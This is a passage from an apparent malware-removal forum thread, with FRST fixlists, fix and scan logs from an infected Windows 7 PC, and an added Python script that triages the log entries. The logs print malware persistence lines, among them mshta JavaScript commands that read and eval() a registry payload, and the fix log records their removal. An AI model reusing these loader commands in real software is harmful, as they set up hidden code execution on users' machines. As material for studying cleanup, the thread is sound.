2015-07-13 02:11 - 2015-07-13 02:12 - 00000000 ___HD C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
C:\ProgramData\msrllq.exe
  • Save it to your USB flashdrive as fixlist.txt

NOTICE: This script was written specifically for this user. Running it on another machine may cause damage to your operating system.

Boot into Recovery Environment

  • Start FRST in a similar manner to when you ran a scan earlier, but this time when it opens ....
    • Press the Fix button once and wait.
    • FRST will process fixlist.txt
    • When finished, it will produce a log fixlog.txt on your USB flashdrive.
  • Exit out of Recovery Environment and copy/paste the log please.
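For readers following along: the fixlist above was built by hand from the FRST log, picking out the entries that share the traits a malware-removal helper looks for. The script below is an added example, not part of this thread and not code from FRST or its author; it encodes those traits as triage rules and runs them over a constructed sample made of lines copied from the log above (one mshta line abridged) plus a few known-good entries. The rules are assumptions drawn from the log, not FRST's own logic: value names with invalid characters, mshta running inline JavaScript that reads and eval()s a registry blob, regsvr32 loading a non-.dll file, unsigned binaries autostarting from ProgramData or AppData, orphaned service entries marked [X], and boot-start drivers with hex-gibberish names or no publisher.

```python
import re
from typing import List, NamedTuple, Set

# Constructed sample: entries copied (one abridged) from the FRST log in this
# thread, plus three known-good entries so the rules have negatives to ignore.
SAMPLE_LOG = r"""
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [169768 2015-04-06] (Apple Inc.)
HKLM\...\Policies\Explorer\Run: [711536280] => C:\ProgramData\msrllq.exe [52736 2010-11-20] ()
HKU\Thomas\...\Run: [**3fc8a7d2<*>] => mshta javascript:g1l9=new%20ActiveXObject("WScript.Shell");wNvs09=g1l9.RegRead("HKCU\\software\\0c778563\\2d0e539a");eval(wNvs09); <===== ATTENTION (Value Name with invalid characters)
HKU\Thomas\...\Run: [d3dxawex] => C:\Users\Thomas\AppData\Roaming\C_G1awex.exe [266240 2015-07-13] ()
HKU\Thomas\...\Run: [DifhAvud] => regsvr32.exe "C:\ProgramData\DifhAvud\AixpIvum.nyz"
S2 mfevtp; C:\Windows\system32\mfevtps.exe [250672 2015-02-17] (McAfee, Inc.)
S2 NetworkHostSrv; "C:\ProgramData\Online\sv.exe" [X]
S0 8b66cd9be5c7a4f2; C:\Windows\System32\Drivers\8b66cd9be5c7a4f2.sys [94152 2015-07-14] ()
S1 fqjnrwka; \??\C:\Windows\system32\drivers\fqjnrwka.sys [X]
S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [68784 2015-02-17] (McAfee, Inc.)
"""

# Autostart value:  HKxx\...\Run: [name] => command [size date] (publisher)
RUN_RE = re.compile(r"^HK\w+(?:-x32)?\\.*?Run(?:Once)?: \[(?P<name>[^\]]*)\] => (?P<cmd>.*)$")
# Service/driver:   S0 name; path [size date] (publisher)  or  ... [X] when the file is gone
SVC_RE = re.compile(r"^(?P<start>[SRU][0-4]) (?P<name>[^;]+); (?P<path>.*)$")
# Trailing "(publisher)"; FRST prints "()" when the binary carries no company name.
PUB_RE = re.compile(r"\(([^()]*)\)\s*$")

SCRIPT_TOKENS = ("mshta ", "javascript:", "eval(", "regread(")
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\users\\")
BOOT_START = ("S0", "S1", "R0", "R1")  # assumption: FRST start-type codes for boot/system start


class Finding(NamedTuple):
    kind: str    # "run" (autostart value) or "svc" (service/driver)
    name: str    # value name, or service/driver name
    reason: str


def publisher_of(text: str):
    """Return the publisher string, '' for an unsigned binary, None if not present."""
    m = PUB_RE.search(text)
    return m.group(1).strip() if m else None


def triage(log_text: str) -> List[Finding]:
    out: List[Finding] = []
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        # FRST appends its own "<===== ATTENTION ..." remarks; split them off first.
        body, _, note = line.partition(" <=====")
        m = RUN_RE.match(body)
        if m:
            name, cmd = m.group("name"), m.group("cmd")
            low = cmd.lower()
            if note:
                out.append(Finding("run", name, "FRST remark: " + note.strip()))
            if re.search(r"[*<>|?]", name):
                out.append(Finding("run", name, "value name uses characters installers never use"))
            if any(tok in low for tok in SCRIPT_TOKENS):
                out.append(Finding("run", name, "script host runs inline code that reads and eval()s a registry blob (fileless persistence)"))
            if "regsvr32" in low and not re.search(r'\.dll"?$', low):
                out.append(Finding("run", name, "regsvr32 loading a file without a .dll extension"))
            if cmd.strip() == "[X]":
                out.append(Finding("run", name, "autostart value whose target no longer exists"))
            if any(d in low for d in USER_WRITABLE) and publisher_of(cmd) == "":
                out.append(Finding("run", name, "unsigned binary autostarting from a user-writable directory"))
            continue
        m = SVC_RE.match(body)
        if m:
            start, name, path = m.group("start"), m.group("name"), m.group("path")
            if note:
                out.append(Finding("svc", name, "FRST remark: " + note.strip()))
            if path.rstrip().endswith("[X]"):
                out.append(Finding("svc", name, "registered service/driver whose file is missing (orphaned entry)"))
                continue
            if start in BOOT_START and re.fullmatch(r"[0-9a-f]{8,}", name):
                out.append(Finding("svc", name, "boot-start driver with a random-looking hex name"))
            if start in BOOT_START and publisher_of(path) == "":
                out.append(Finding("svc", name, "boot-start driver with no publisher"))
    return out


def flagged_names(log_text: str) -> Set[str]:
    """Names of every entry that tripped at least one rule."""
    return {f.name for f in triage(log_text)}


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f.kind:3} {f.name:20} {f.reason}")
```

On the sample, the seven entries that the helper put into the fixlist are flagged and the Apple and McAfee entries are not. The rules are deliberately narrow and a hit is a prompt to look closer, not a verdict: a genuine vendor driver with a stripped company name would also trip the "no publisher" rule, which is why the helper cross-checks against the file dates and the "One Month Created" section before deciding what to move.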
 
Fixlog.txt



Fix result of Farbar Recovery Scan Tool (x64) Version:20-07-2015
Ran by SYSTEM at 2015-07-24 16:10:57 Run:1
Running from C:\
Boot Mode: Recovery
==============================================
fixlist content:
*****************
HKLM-x32\...\Run: [] => [X]
HKLM\...\Policies\Explorer\Run: [711536280] => C:\ProgramData\msrllq.exe [52736 2010-11-20] ()
HKU\Thomas\...\Run: [**3fc8a7d2<*>] => mshta javascript:Ms3ZRq7u="V";g1l9=new%20ActiveXObject("WScript.Shell");ZolWKzx5R="EN4hV7";wNvs09=g1l9.RegRead("HKCU\\software\\0c778563\\2d0e539a");Zyilg2gbV="hhx";eval(wNvs09);UeEVVe2o7="LbiEUgXF"; <===== ATTENTION (Value Name with invalid characters)
HKU\Thomas\...\Run: [**fdb291dc<*>] => mshta javascript:X2USNjN5="K1v";V22z=new%20ActiveXObject("WScript.Shell");B2kFNQdtA9="IqT";eO11jM=V22z.RegRead("HKCU\\software\\0c778563\\2d0e539a");c3NvvUZAl="Q";eval(eO11jM);gVac7qe="v7DcfT"; <===== ATTENTION (Value Name with invalid characters)
HKU\Thomas\...\Run: [d3dxawex] => C:\Users\Thomas\AppData\Roaming\C_G1awex.exe [266240 2015-07-13] ()
HKU\Thomas\...\Run: [DifhAvud] => regsvr32.exe "C:\ProgramData\DifhAvud\AixpIvum.nyz"
HKU\Thomas\...\Run: [FireFoxUpdServeisSystem] => C:\Users\Thomas\AppData\Roaming\FireFoxUpdServeis\Microsoft_naragugica.exe [77312 2015-07-14] ()
S2 NetworkHostSrv; "C:\ProgramData\Online\sv.exe" [X]
S0 8b66cd9be5c7a4f2; C:\Windows\System32\Drivers\8b66cd9be5c7a4f2.sys [94152 2015-07-14] () <===== ATTENTION Necurs Rootkit?
S1 fqjnrwka; \??\C:\Windows\system32\drivers\fqjnrwka.sys [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S3 PcdrNdisuio; syswow64\drivers\pcdrndisuio.sys [X]
S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X]
2015-07-21 13:08 - 2015-07-21 13:08 - 06420480 _____ C:\Program Files (x86)\GUTD3D3.tmp
2015-07-18 19:31 - 2015-07-22 19:41 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\tor
2015-07-14 03:26 - 2015-07-14 03:26 - 00094152 _____ C:\Windows\System32\Drivers\8b66cd9be5c7a4f2.sys
2015-07-14 03:22 - 2015-07-23 23:27 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\FireFoxUpdServeis
2015-07-14 03:22 - 2015-07-14 03:22 - 00000064 _____ C:\Users\Thomas\AppData\Roaming\$FFFCB712AC.sys
2015-07-13 09:46 - 2015-07-13 09:46 - 00000000 ____D C:\ProgramData\DifhAvud
2015-07-13 05:48 - 2015-07-13 08:49 - 00266240 _____ C:\Users\Thomas\AppData\Roaming\C_G1awex.exe
2015-07-13 02:12 - 2015-07-13 02:14 - 00000157 _____ C:\Users\Thomas\AppData\Local\svcxdcl32.dat
2015-07-13 02:11 - 2015-07-14 03:22 - 00000000 _____ C:\Users\Thomas\AppData\Local\svcxdcl32.exe
2015-07-13 02:11 - 2015-07-13 02:12 - 00000000 ___HD C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
C:\ProgramData\msrllq.exe
*****************
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\711536280 => value removed successfully
HKU\Thomas\Software\Microsoft\Windows\CurrentVersion\Run\\**3fc8a7d2<*> => value removed successfully
HKU\Thomas\Software\Microsoft\Windows\CurrentVersion\Run\\**fdb291dc<*> => value removed successfully
HKU\Thomas\Software\Microsoft\Windows\CurrentVersion\Run\\d3dxawex => value removed successfully
HKU\Thomas\Software\Microsoft\Windows\CurrentVersion\Run\\DifhAvud => value removed successfully
HKU\Thomas\Software\Microsoft\Windows\CurrentVersion\Run\\FireFoxUpdServeisSystem => value removed successfully
NetworkHostSrv => Service removed successfully
8b66cd9be5c7a4f2 => Service removed successfully
fqjnrwka => Service removed successfully
MBAMSwissArmy => Service removed successfully
PcdrNdisuio => Service removed successfully
VBoxNetFlt => Service removed successfully
C:\Program Files (x86)\GUTD3D3.tmp => moved successfully.
C:\Users\Thomas\AppData\Roaming\tor => moved successfully.
C:\Windows\System32\Drivers\8b66cd9be5c7a4f2.sys => moved successfully.
C:\Users\Thomas\AppData\Roaming\FireFoxUpdServeis => moved successfully.
C:\Users\Thomas\AppData\Roaming\$FFFCB712AC.sys => moved successfully.
C:\ProgramData\DifhAvud => moved successfully.
C:\Users\Thomas\AppData\Roaming\C_G1awex.exe => moved successfully.
C:\Users\Thomas\AppData\Local\svcxdcl32.dat => moved successfully.
C:\Users\Thomas\AppData\Local\svcxdcl32.exe => moved successfully.
C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8} => moved successfully.
C:\ProgramData\msrllq.exe => moved successfully.
==== End of Fixlog 16:10:58 ====
 
Are you still in a loop or can you start the computer normally now?

If you can start the computer normally, please do the following:


  • Download Malwarebytes Anti-Rootkit from HERE
  • Unzip the contents to a folder in a convenient location, preferably the desktop.
  • Open the folder where the contents were unzipped and run mbar.exe. Note: If a rootkit is interfering with the installation of the drivers you will see a message that states that the DDA driver was not installed and that you should reboot your computer to install it. Click Yes.
  • Follow the instructions in the wizard to update and allow the program to scan your computer for threats.
  • Click on the Cleanup button to remove any threats and reboot if prompted to do so.
  • Wait while the system shuts down and the cleanup process is performed.
  • Perform another scan with Malwarebytes Anti-Rootkit to verify that no threats remain. If they do, then click Cleanup once more and repeat the process.
  • When done, please post the two logs produced; they will be in the MBAR folder: mbar-log.txt and system-log.txt
 
The PC is still not booting; it appears to be in the same loop. :-(

I am seeing the following:

Problem Signature 07: CorruptFile
 
Please provide a fresh FRST log.

Plug the flash drive you prepared previously into the infected PC.

Enter System Recovery Options.

To enter System Recovery Options from the Advanced Boot Options:
  • Restart the computer.
  • As soon as the BIOS is loaded begin tapping the F8 key until Advanced Boot Options appears.
  • Use the arrow keys to select the Repair your computer menu item.
  • Choose your language settings, and then click Next.
  • Select the operating system you want to repair, and then click Next.
  • Select your user account and click Next.

On the System Recovery Options menu you will get the following options:
Startup Repair
System Restore
Windows Complete PC Restore
Windows Memory Diagnostic Tool
Command Prompt


  • Select Command Prompt
  • In the command window type in notepad and press Enter.
  • The notepad opens. Under File menu select Open.
  • Select "Computer" and find your flash drive letter and close the notepad.
  • In the command window type e:\frst.exe (for x64 bit version type e:\frst64) and press Enter
    Note: Replace letter e with the drive letter of your flash drive.
  • The tool will start to run.
  • When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) on the flash drive. Please copy and paste it to your reply.
 
Corrine

Thanks for your help thus far; frst64 output below:


Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:20-07-2015
Ran by SYSTEM on MININT-7F955RL on 24-07-2015 23:05:03
Running from C:\
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Recovery
The current controlset is ControlSet001
ATTENTION!:=====> If the system is bootable FRST must be run from normal or Safe mode to create a complete log.
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Geeks to Go Forum
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [Stage Remote] => C:\Program Files (x86)\Dell\Stage Remote\StageRemote.exe [2022976 2011-06-27] ()
HKLM\...\Run: [boinctray] => C:\Program Files\BOINC\boinctray.exe [68928 2015-03-09] (Space Sciences Laboratory)
HKLM\...\Run: [boincmgr] => C:\Program Files\BOINC\boincmgr.exe [8926016 2015-03-09] (Space Sciences Laboratory)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [169768 2015-04-06] (Apple Inc.)
HKLM-x32\...\Run: [RemoteControl9] => C:\Program Files (x86)\CyberLink\PowerDVD9\PDVD9Serv.exe [87336 2010-10-01] (CyberLink Corp.)
HKLM-x32\...\Run: [PDVD9LanguageShortcut] => C:\Program Files (x86)\CyberLink\PowerDVD9\Language\Language.exe [50472 2010-09-17] (CyberLink Corp.)
HKLM-x32\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [616272 2015-04-07] (McAfee, Inc.)
HKLM-x32\...\Run: [RoxWatchTray] => C:\Program Files (x86)\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxWatchTray12OEM.exe [240112 2010-11-24] (Sonic Solutions)
HKLM-x32\...\Run: [Desktop Disc Tool] => C:\Program Files (x86)\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe [514544 2010-11-17] ()
HKLM-x32\...\Run: [AccuWeatherWidget] => C:\Program Files (x86)\Dell Stage\Dell Stage\AccuWeather\accuweather.exe [968048 2012-02-01] ()
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-03-20] (Apple Inc.)
HKLM-x32\...\Run: [mcpltui_exe] => C:\Program Files\Common Files\McAfee\Platform\mcuicnt.exe [719272 2015-04-02] (McAfee, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [335232 2015-04-10] (Oracle Corporation)
HKLM\...\RunOnce: [*Restore] => C:\Windows\system32\rstrui.exe [296960 2015-05-25] (Microsoft Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKU\Orrin JNR\...\Run: [Google Update] => C:\Users\Orrin JNR\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2012-07-15] (Google Inc.)
HKU\Thomas\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [53282944 2015-06-16] (Skype Technologies S.A.)
HKU\Thomas\...\Run: [Amazon Music] => C:\Users\Thomas\AppData\Local\Amazon Music\Amazon Music Helper.exe [6277952 2014-12-07] ()
HKU\Thomas\...\Run: [OneDrive] => C:\Users\Thomas\AppData\Local\Microsoft\OneDrive\OneDrive.exe [382664 2015-05-22] (Microsoft Corporation)
HKU\Thomas\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [427520 2009-07-13] (Microsoft Corporation)
HKU\Thomas\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [7451928 2015-03-13] (Piriform Ltd)
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77128 2015-01-19] (Apple Inc.)
S2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2739888 2015-05-18] (Microsoft Corporation)
S2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [155368 2015-07-03] (McAfee, Inc.)
S2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [753768 2015-04-07] (McAfee, Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
S2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.5.450.0\McCSPServiceHost.exe [207344 2015-04-08] (McAfee, Inc.)
S2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 McNaiAnn; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [612688 2015-04-09] (McAfee, Inc.)
S2 mcpltsvc; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 McProxy; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232656 2015-02-17] (McAfee, Inc.)
S2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [372144 2015-04-06] (McAfee, Inc.)
S2 mfevtp; C:\Windows\system32\mfevtps.exe [250672 2015-02-17] (McAfee, Inc.)
S2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 syshost32; C:\Windows\Installer\{269A4ED8-3094-6D54-48F0-3CC425AC5ECE}\syshost.exe [196923 2015-07-14] ()
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [68784 2015-02-17] (McAfee, Inc.)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [197704 2013-09-23] (McAfee, Inc.)
S2 McPvDrv; C:\Windows\system32\drivers\McPvDrv.sys [76064 2015-03-27] (McAfee, Inc.)
S3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [401736 2015-02-17] (McAfee, Inc.)
S3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [337888 2015-02-17] (McAfee, Inc.)
S0 mfedisk; C:\Windows\System32\DRIVERS\mfedisk.sys [101872 2015-02-17] (McAfee, Inc.)
S3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [488000 2015-02-17] (McAfee, Inc.)
S0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [864072 2015-02-17] (McAfee, Inc.)
S3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [482600 2015-01-15] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [100720 2015-01-15] (McAfee, Inc.)
S0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [340448 2015-02-17] (McAfee, Inc.)
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [27520 2007-05-14] (Research In Motion Limited)
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [564824 2013-01-03] (Duplex Secure Ltd.)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-07-24 11:40 - 2015-07-24 23:05 - 00000000 _____ C:\FRST.txt
2015-07-24 11:36 - 2015-07-24 23:05 - 00000000 ____D C:\FRST
2015-07-23 01:37 - 2015-07-23 01:37 - 02135552 _____ (Farbar) C:\frst64.exe
2015-07-21 12:29 - 2015-07-21 12:25 - 00002289 _____ C:\Users\Thomas\Desktop\SFCFix.zip
2015-07-21 12:24 - 2015-07-21 12:25 - 00002289 _____ C:\Users\Thomas\Downloads\SFCFix.zip
2015-07-17 14:37 - 2015-07-21 12:51 - 00000000 ____D C:\Users\Thomas\AppData\Local\niemiro
2015-07-17 05:03 - 2015-07-17 05:03 - 00000387 _____ C:\Users\Thomas\Desktop\copy.txt
2015-07-17 04:56 - 2015-07-17 04:57 - 00000000 ____D C:\Users\Thomas\copy
2015-07-17 04:55 - 2015-07-17 04:55 - 00000000 ____D C:\Users\Thomas\Downloads\Copy
2015-07-17 03:11 - 2015-07-21 12:51 - 00003148 _____ C:\Users\Thomas\Desktop\SFCFix.txt
2015-07-17 03:11 - 2015-07-21 12:51 - 00000000 ____D C:\SFCFix
2015-07-17 02:50 - 2015-07-17 02:55 - 00003212 _____ C:\Users\Thomas\sfcdetails.txt
2015-07-15 23:06 - 2015-07-15 23:06 - 00000000 ____D C:\Quarantine
2015-07-15 22:56 - 2015-07-17 03:37 - 00000000 ____D C:\Program Files (x86)\stinger
2015-07-15 22:55 - 2015-07-22 19:41 - 00000000 ____D C:\Users\Thomas\Downloads\stinger32-epo
2015-07-15 13:35 - 2015-07-15 13:35 - 00000000 ____D C:\Users\Thomas\Desktop\McAfee File Lock
2015-07-15 12:14 - 2015-07-15 13:18 - 00095802 _____ C:\Users\Thomas\Desktop\sfcdetails.txt
2015-07-15 11:58 - 2015-07-15 11:58 - 00000000 ____D C:\Users\Thomas\McAfee File Lock
2015-07-14 03:26 - 2015-07-14 03:26 - 00000342 _____ C:\Windows\PFRO.log
2015-07-13 12:45 - 2015-07-14 03:26 - 00000112 _____ C:\Windows\setupact.log
2015-07-13 12:45 - 2015-07-13 12:45 - 00000000 _____ C:\Windows\setuperr.log
2015-07-13 12:16 - 2015-07-13 12:16 - 00000000 ____D C:\Windows\System32\McAfee File Lock
2015-07-03 06:35 - 2015-07-12 10:09 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-06-28 10:52 - 2015-06-29 01:12 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\vlc
2015-06-28 10:50 - 2015-06-28 10:50 - 00001032 _____ C:\Users\Public\Desktop\VLC media player.lnk
2015-06-28 10:50 - 2015-06-28 10:50 - 00001032 _____ C:\ProgramData\Desktop\VLC media player.lnk
2015-06-28 10:49 - 2015-06-28 10:49 - 28849904 _____ C:\Users\Thomas\Downloads\vlc-2.2.1-win32.exe
2015-06-28 10:49 - 2015-06-28 10:49 - 00000000 ____D C:\Program Files (x86)\VideoLAN
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-07-23 23:28 - 2014-12-09 19:22 - 00000000 ____D C:\Windows\System32\appraiser
2015-07-23 23:28 - 2014-08-09 05:12 - 00000000 ____D C:\users\Guest
2015-07-23 23:28 - 2014-05-06 18:00 - 00000000 ___SD C:\Windows\System32\CompatTel
2015-07-23 23:28 - 2012-07-15 07:50 - 00000000 ____D C:\users\Orrin JNR
2015-07-23 23:28 - 2012-05-08 08:58 - 00000000 ____D C:\users\Thomas
2015-07-23 23:28 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\servicing
2015-07-23 23:27 - 2015-05-15 23:52 - 00000000 __RSD C:\Users\Thomas\Documents\McAfee Vaults
2015-07-23 23:27 - 2015-04-04 18:00 - 00000000 ___SD C:\Windows\System32\GWX
2015-07-23 23:27 - 2014-05-14 11:23 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\Skype
2015-07-23 23:27 - 2012-11-29 11:21 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\uTorrent
2015-07-23 23:27 - 2012-05-09 12:20 - 00000000 ____D C:\ProgramData\McAfee Security Scan
2015-07-23 23:27 - 2012-05-01 03:52 - 00000000 ____D C:\Program Files (x86)\Dell DataSafe Local Backup
2015-07-23 23:25 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\registration
2015-07-23 23:23 - 2012-05-08 09:19 - 00000000 ____D C:\ProgramData\BOINC
2015-07-23 23:22 - 2015-04-04 02:39 - 00000000 ____D C:\Program Files\Microsoft Office 15
2015-07-23 23:22 - 2012-05-01 04:08 - 00000000 ____D C:\Program Files\mcafee
2015-07-22 10:20 - 2012-05-01 04:26 - 00000000 ____D C:\Users\Default\AppData\Local\SoftThinks
2015-07-22 10:20 - 2012-05-01 04:26 - 00000000 ____D C:\Users\Default User\AppData\Local\SoftThinks
2015-07-22 10:05 - 2013-10-23 06:27 - 00000000 ____D C:\ProgramData\boost_interprocess
2015-07-21 12:57 - 2012-05-01 04:15 - 00000000 ____D C:\ProgramData\Sonic
2015-07-15 19:47 - 2010-11-20 23:16 - 00000000 ___RD C:\Users\Public\Recorded TV
2015-07-14 14:58 - 2012-05-08 09:00 - 00000422 _____ C:\Windows\Tasks\SystemToolsDailyTest.job
2015-07-14 14:17 - 2013-03-28 13:55 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-07-14 14:06 - 2012-09-02 09:09 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-07-14 13:17 - 2013-03-28 13:55 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-07-14 13:17 - 2012-05-01 03:35 - 00778416 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-07-14 13:17 - 2012-05-01 03:35 - 00142512 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-07-14 12:49 - 2012-07-15 12:24 - 00000872 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3274687172-3602840966-2228239552-1006Core.job
2015-07-14 09:06 - 2012-09-02 09:09 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-07-14 03:42 - 2009-07-13 20:45 - 00028352 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-07-14 03:42 - 2009-07-13 20:45 - 00028352 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-07-14 03:26 - 2009-07-13 21:08 - 00032620 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2015-07-14 03:26 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-07-13 19:42 - 2015-04-04 02:44 - 00004978 _____ C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for trustno1-Thomas trustno1
2015-07-13 12:46 - 2012-12-22 03:26 - 00000000 ___RD C:\Users\Thomas\SkyDrive
2015-07-13 10:53 - 2015-05-15 23:49 - 00000000 ____D C:\Program Files (x86)\McAfee
2015-07-13 10:53 - 2014-08-21 12:49 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-07-13 05:00 - 2012-05-09 05:00 - 00003488 _____ C:\Windows\System32\Tasks\PCDEventLauncher
2015-07-13 05:00 - 2012-05-08 09:00 - 00003450 _____ C:\Windows\System32\Tasks\SystemToolsDailyTest
2015-07-12 09:07 - 2009-07-13 21:13 - 00006506 _____ C:\Windows\System32\PerfStringBackup.INI
2015-07-12 09:00 - 2012-05-08 09:00 - 00000564 _____ C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2015-07-12 08:47 - 2014-11-12 00:47 - 00000000 __SHD C:\Users\Thomas\AppData\Local\EmieBrowserModeList
2015-07-12 08:47 - 2014-04-30 09:30 - 00000000 __SHD C:\Users\Thomas\AppData\Local\EmieUserList
2015-07-12 08:47 - 2014-04-30 09:30 - 00000000 __SHD C:\Users\Thomas\AppData\Local\EmieSiteList
2015-07-04 19:00 - 2012-05-08 09:00 - 00004268 _____ C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2015-07-02 12:51 - 2009-07-13 21:09 - 00000000 ____D C:\Windows\System32\Tasks\WPD
2015-06-26 03:30 - 2014-11-09 11:44 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-06-26 03:30 - 2012-05-01 03:54 - 00000000 ____D C:\ProgramData\Skype
==================== Known DLLs (Whitelisted) ================

==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
